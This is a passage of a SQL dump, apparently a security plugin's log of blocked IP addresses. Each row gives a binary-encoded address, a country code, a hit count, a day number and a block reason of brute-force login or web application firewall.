('\0\0\0\0\0\0\0\0\0\0ÿÿn¿×', 'IN', 1, 19805, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÂ&', 'UA', 1, 19805, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿŒîXS', 'GB', 1, 19805, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ(qÌX', 'US', 1, 19804, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿŸKp3', 'CN', 1, 19804, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ\\5`‰', 'RU', 1, 19804, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ^.x', 'PT', 1, 19805, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ’¾Z#', 'SG', 1, 19805, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¤„ª', 'FR', 1, 19805, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÆ&S‘', 'GB', 1, 19805, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ­Ôío', 'DE', 4, 19803, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 'FR', 47, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÐWÎ´', 'HK', 1, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿhƒ*§', 'US', 1, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ’¾Z#', 'SG', 1, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ§r‘0', 'CA', 1, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿKw–*', 'DE', 1, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿT"“O', 'FI', 1, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ-ž&', 'TR', 1, 19804, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ\\Íñ', 'FR', 1, 19804, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿw\Z-', 'HK', 1, 19804, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 'DE', 35, 19804, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿk®ºJ', 'US', 3, 19804, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÃJ&«', 'SE', 1, 19804, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ’¾Z#', 'SG', 1, 19804, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÄØ', 'RU', 1, 19804, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ/óþT', 'HK', 1, 19804, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ3ON)', 'CA', 1, 19804, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ^Hy''', 'PL', 1, 19804, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ3i', 'FR', 1, 19804, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿT÷ù', 'DE', 1, 19804, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÂ0ûæ', 'DE', 1, 19804, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿT÷ž', 'DE', 1, 19804, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ#Ö¾Ô', 'NL', 2, 19804, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÃÉÉ', 'DE', 2, 19804, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÑ¼Ú', 'US', 1, 19804, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¼á(Œ', 'RU', 2, 19804, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ^.x', 'PT', 1, 19804, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[k–\\', 'DE', 2, 19804, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿg‘2E', 'IN', 1, 19804, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÙ>', 'NL', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ½IåÒ', 'BR', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿg¡7›', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿgÌy', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿš æ', 'GH', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿN9%À', 'LT', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ1+ í', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿqkž', 'BD', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ''$ã÷', 'PK', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÊŽ›j', 'PK', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ‡Ù', 'RS', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ…\Z.', 'US', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÉ``', 'BR', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÈkZ\Z', 'AR', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿg/#Û', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿgx²Ù', 'IN', 2, 19802, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ(qÌX', 'US', 1, 19802, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿNŸcÍ', 'DE', 1, 19802, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\÷×', 'BG', 23, 19801, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ^œEv', 'BG', 1, 19801, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ôú', 'BG', 1, 19801, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿJ0–', 'US', 2, 19801, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿCÍ´$', 'US', 1, 19801, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿRîŠ', 'US', 1, 19801, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿT"“O', 'FI', 1, 19801, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ§r‘0', 'CA', 3, 19801, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿŒîXS', 'GB', 2, 19801, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ€Çç(', 'SG', 1, 19801, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ­ù4e', 'DE', 4, 19801, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ°Jë', 'GB', 1, 19801, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿB^cå', 'US', 1, 19801, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿk®ºJ', 'US', 1, 19801, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿAmd', 'FI', 2, 19801, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¤DÄ', 'DE', 1, 19801, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ–žMê', 'CN', 4, 19801, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿiž', 'IN', 3, 19802, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ§r‘0', 'CA', 5, 19802, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿCÍ´$', 'US', 3, 19802, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿŒîXS', 'GB', 1, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¹‘', 'NL', 1, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ^.©à', 'PT', 1, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿg-Bä', 'HK', 2, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÃn&¤', 'IR', 3, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ3‘.''', 'GB', 1, 19803, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ+¹š', 'HK', 1, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿg’o', 'VN', 1, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿXcó', 'DE', 2, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ§Gçà', 'IN', 2, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿJ0–', 'US', 2, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿQ\0ï', 'HU', 1, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¡aCå', 'DE', 1, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ\\Í“ø', 'FR', 1, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿg:', 'HK', 2, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[', 'IR', 2, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ­ù4z', 'DE', 20, 19803, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ-7)÷', 'US', 1, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ+€,ó', 'HK', 1, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿà^', 'HK', 1, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¹b˜', 'KZ', 1, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿv‹²:', 'SG', 1, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿgÃôå', 'IN', 1, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿô€>', 'IN', 1, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÙ"ð', 'HK', 1, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿgŸ3º', 'VN', 1, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿB^cå', 'US', 2, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ^.x', 'PT', 1, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü¬', 'BG', 53, 19795, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÂ&', 'UA', 1, 19795, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ-‹Çm', 'TR', 1, 19795, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ²€sP', 'SG', 7, 19795, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¹‘', 'NL', 1, 19795, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿeW', 'RU', 1, 19811, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ^œ@', 'BG', 10, 19811, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¹ÙÅ…', 'AT', 3, 19811, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ€ÇÖ©', 'SG', 2, 19811, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ%»N‹', 'FR', 1, 19795, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¡aCå', 'DE', 1, 19795, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ.®Ì', 'DE', 1, 19795, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ£@F', 'FR', 7, 19796, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿT"“O', 'FI', 1, 19796, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿXcó', 'DE', 1, 19796, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿUì™', 'FR', 1, 19796, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿg‘2E', 'IN', 1, 19796, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿB^cå', 'US', 3, 19796, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ%»N‹', 'FR', 2, 19796, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¡aCå', 'DE', 1, 19796, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ-OyÇ', 'IN', 1, 19796, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿˆ', 'GB', 1, 19796, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿN‡Zª', 'TR', 1, 19796, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿD²œe', 'IN', 1, 19796, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿŒîXS', 'GB', 1, 19796, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ&òõs', 'DE', 1, 19796, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿAmd', 'FI', 1, 19796, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÎ½,', 'SG', 1, 19796, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ”q ', 'IN', 1, 19796, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ^.©à', 'PT', 1, 19796, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ]žZH', 'SE', 1, 19796, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ]žZI', 'SE', 1, 19796, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ]žZG', 'SE', 1, 19796, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ]žZE', 'SE', 1, 19796, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿT"“%', 'FI', 2, 19796, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿŽ„Â«', 'DE', 1, 19796, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿŽ„ª€', 'DE', 1, 19796, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿNJ6', 'US', 2, 19796, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ-O*S', 'US', 2, 19796, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿUC÷', 'HU', 1, 19796, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿe+\\ð', 'CN', 1, 19796, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ.®Ì', 'DE', 1, 19796, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ\\Í“ø', 'FR', 1, 19796, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ+¹š', 'HK', 1, 19796, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ^.x', 'PT', 1, 19796, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\úˆ', 'BG', 1, 19797, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ.Q“', 'DE', 1, 19798, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ\\Í“ø', 'FR', 1, 19801, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿrtQä', 'CN', 1, 19813, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ­ù4z', 'DE', 2, 19813, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 'BG', 8, 19813, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ­Ôío', 'DE', 2, 19813, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 'BG', 3, 19813, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ\\Í6‚', 'FR', 1, 19813, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¡#œœ', 'NL', 1, 19801, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ´÷Rb', 'ID', 2, 19819, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿpÎÐ', 'PH', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 'NL', 36, 19819, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ^œEv', 'BG', 1, 19818, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿŽ]ét', 'NL', 1, 19820, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÂ0ûæ', 'DE', 1, 19820, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 'NL', 1, 19820, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿV}’È', 'RO', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿsa\0', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿgY@ñ', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿsaï¼', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ1%Õ', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿg²>ô', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿu×¢', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿl²«ú', 'US', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿw(PÕ', 'BD', 6, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿWý:µ', 'GE', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿcóÆ', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ³h«', 'BR', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿºzh#', 'AR', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ€Ç^¼', 'SG', 1, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ-ž&', 'TR', 5, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÓòY', 'TW', 1, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 'BG', 39, 19814, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿMÝžˆ', 'RU', 7, 19814, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ§Vnd', 'DE', 4, 19814, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 'BG', 8, 19814, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ-WÔL', 'DE', 1, 19814, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 'BG', 1, 19814, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¯¥X', 'CN', 2, 19814, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿõš¨', 'SG', 1, 19813, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ)J‡Ô', 'CV', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿw˜™N', 'PK', 3, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿo}ç›', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿgD~', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ»,ÿŽ', 'BR', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿeã', 'RU', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 'NL', 26, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 'SG', 34, 19818, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ1–g', 'PH', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿg1Êr', 'BD', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ]W|', 'RS', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿgÔž', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿO<È', 'IT', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÔ:gî', 'GE', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÅù)£', 'MZ', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ%ûÝ4', 'RO', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿm\\±[', 'RS', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿS+ˆR', 'ES', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿfÛÚÕ', 'TZ', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ1%u‘', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ<5[Ï', 'MY', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ1ÌØ', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿo}ÝÊ', 'IN', 2, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÊwO', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿˆž)%', 'PH', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ~Ü', 'GB', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ1ÍÂ', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ½%Kã', 'BR', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿwR^z', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿgÿ‘F', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¿,ÅE', 'BR', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿn&ÿh', 'PK', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÅçú', 'BI', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÊF%2', 'MN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿº_=Ô', 'VE', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÑa¢', 'SG', 3, 19801, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÎí ', 'US', 1, 19801, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ-ž&', 'TR', 2, 19801, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿJÐ;ð', 'US', 1, 19801, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ½Gï¦', 'BR', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿg›Þ8', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿTê`.', 'RO', 1, 19803, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¹kpÅ', 'DK', 1, 19802, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ^.x', 'PT', 2, 19802, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ#Ö¾Ô', 'NL', 1, 19802, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¡aCå', 'DE', 2, 19802, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ“¶ÊÇ', 'US', 1, 19802, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ’¾Z#', 'SG', 1, 19802, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÂ&', 'UA', 2, 19802, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ€Çû‹', 'SG', 28, 19802, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿAmd', 'FI', 1, 19802, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ•„W', 'IN', 1, 19802, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ4¥Ë', 'US', 1, 19802, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿN&p', 'IR', 1, 19802, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿTê`.', 'RO', 1, 19802, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿCÞ†\r', 'US', 1, 19802, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿQ\0ï', 'HU', 1, 19802, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ­ù4e', 'DE', 4, 19802, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿB^cå', 'US', 2, 19802, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿJ0–', 'US', 1, 19802, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ;*xz', 'CN', 1, 19795, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿR’(X', 'RU', 1, 19812, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ\\Í6‚', 'FR', 1, 19812, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ\\Í6‚', 'FR', 1, 19811, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ²Ž\\', 'DE', 1, 19795, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿMÞ>á', 'RU', 1, 19795, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ4¬––', 'IN', 1, 19795, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ§VC1', 'DE', 1, 19795, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÎTf', 'US', 1, 19810, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿgnVÙ', 'VN', 1, 19810, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ“-H½', 'RU', 10, 19809, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ%»N‹', 'FR', 2, 19798, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÂ&', 'UA', 3, 19819, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿYø®	', 'NL', 1, 19819, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿNGÜ', 'DE', 1, 19819, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ’´Ú', 'GE', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿŽ]ét', 'NL', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 'SG', 34, 19818, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿUË''ë', 'LV', 3, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 'US', 4, 19819, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 'SG', 38, 19819, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿËsUŠ', 'IN', 1, 19819, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿuØmŸ', 'IN', 1, 19819, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ}“', 'IN', 1, 19819, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ·R¡', 'IN', 1, 19819, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ\rêA6', 'IN', 1, 19798, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿŒîXS', 'GB', 1, 19798, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿKw–*', 'DE', 2, 19798, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÄØ', 'RU', 1, 19798, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ€ÇÉ', 'IN', 4, 19812, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ­ù4z', 'DE', 2, 19812, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 'SG', 75, 19811, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ­ù4x', 'DE', 2, 19811, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¹á!', 'RU', 1, 19811, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¹2&', 'RU', 1, 19809, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿe', 'RU', 1, 19809, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ­ù4x', 'DE', 2, 19808, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ§Vnd', 'DE', 2, 19808, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ3‘.''', 'GB', 4, 19809, 'waf'),
